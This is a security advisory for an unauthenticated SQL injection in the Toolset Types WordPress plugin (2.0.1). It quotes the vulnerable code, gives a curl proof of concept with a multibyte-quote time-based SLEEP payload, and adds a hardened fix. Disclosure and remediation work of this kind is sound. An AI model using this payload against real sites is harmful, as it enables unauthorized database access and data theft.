Toolset Types [SQL Injection]
The Toolset Types plugin is vulnerable to unauthenticated SQL injection attacks.
Description
The plugin registers the AJAX action wpt_suggest_taxonomy_term, which provides a convenient way to search for WordPress terms. This action calls the \WPToolset_Forms_Bootstrap::wpt_suggest_taxonomy_term() method, which performs the requested search. The action is registered as a non-privileged one, so an attacker can perform this attack without authenticating.
The plugin supports WPML integration: if the WPML plugin is installed and active, it provides the functionality to search for translated terms using the taxonomy parameter, passed either in the request body or as a query parameter.
Because WordPress applies the addslashes() function to all request parameters, a multibyte character encoding must be set on the database connection for this attack to succeed; under that condition the attack is still possible, as [Chris Shiflett showed in this blog post](http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string).
Vulnerable code:
File toolset-forms/bootstrap.php, line 172:
$tax_where .= " AND t.term_id in (SELECT element_id from {$wpdb->prefix}icl_translations WHERE element_type = 'tax_{$_REQUEST['taxonomy']}' AND language_code = '{$lang}' ) ";
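As an added illustration (not the plugin's own code), the vulnerable interpolation from the line above placed beside a hardened version that validates the taxonomy name and binds the values with $wpdb->prepare(). Wrapping the fragment into functions and passing $wpdb and $lang as parameters are assumptions made for the example.

```php
<?php
// Added example, not code from the Toolset Types plugin. The two functions
// build the same WHERE fragment; only the hardened one is safe to use.
// Assumption: $wpdb and $lang are passed in instead of being in global scope.

// Vulnerable: $_REQUEST['taxonomy'] is interpolated straight into the SQL.
// addslashes() on request params does not protect it when the connection
// uses a multibyte charset, as described above.
function build_tax_where_vulnerable( $wpdb, $lang ) {
    return " AND t.term_id in (SELECT element_id from {$wpdb->prefix}icl_translations"
         . " WHERE element_type = 'tax_{$_REQUEST['taxonomy']}' AND language_code = '{$lang}' ) ";
}

// Hardened: accept only a registered taxonomy name, then bind both values.
function build_tax_where_hardened( $wpdb, $lang ) {
    // sanitize_key() reduces the input to [a-z0-9_-], which is all a
    // WordPress taxonomy name may contain.
    $taxonomy = isset( $_REQUEST['taxonomy'] ) ? sanitize_key( $_REQUEST['taxonomy'] ) : '';

    // Reject anything that is not a taxonomy WordPress knows about.
    if ( '' === $taxonomy || ! taxonomy_exists( $taxonomy ) ) {
        return '';
    }

    // $wpdb->prepare() escapes with the active connection charset, so the
    // multibyte bypass that defeats addslashes() does not apply here.
    return $wpdb->prepare(
        " AND t.term_id IN (SELECT element_id FROM {$wpdb->prefix}icl_translations"
        . " WHERE element_type = %s AND language_code = %s ) ",
        'tax_' . $taxonomy,
        $lang
    );
}
```

If the suggestion endpoint does not need to serve anonymous visitors, registering it only under the wp_ajax_ hook (not wp_ajax_nopriv_) removes the unauthenticated exposure described above as well.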
PoC
curl 'http://sbwptop.dev/wp-admin/admin-ajax.php' \
  -d 'action=wpt_suggest_taxonomy_term&q=1&taxonomy=%e5%27 AND (SLEEP(5)); --'
- 1 June 2016
- Pan Vag
- wp-types.com
- Toolset Types
- 2.0.1
- WordPress 4.5.2, WPML Multilingual CMS 3.1.9.7
- DWF-2016-87052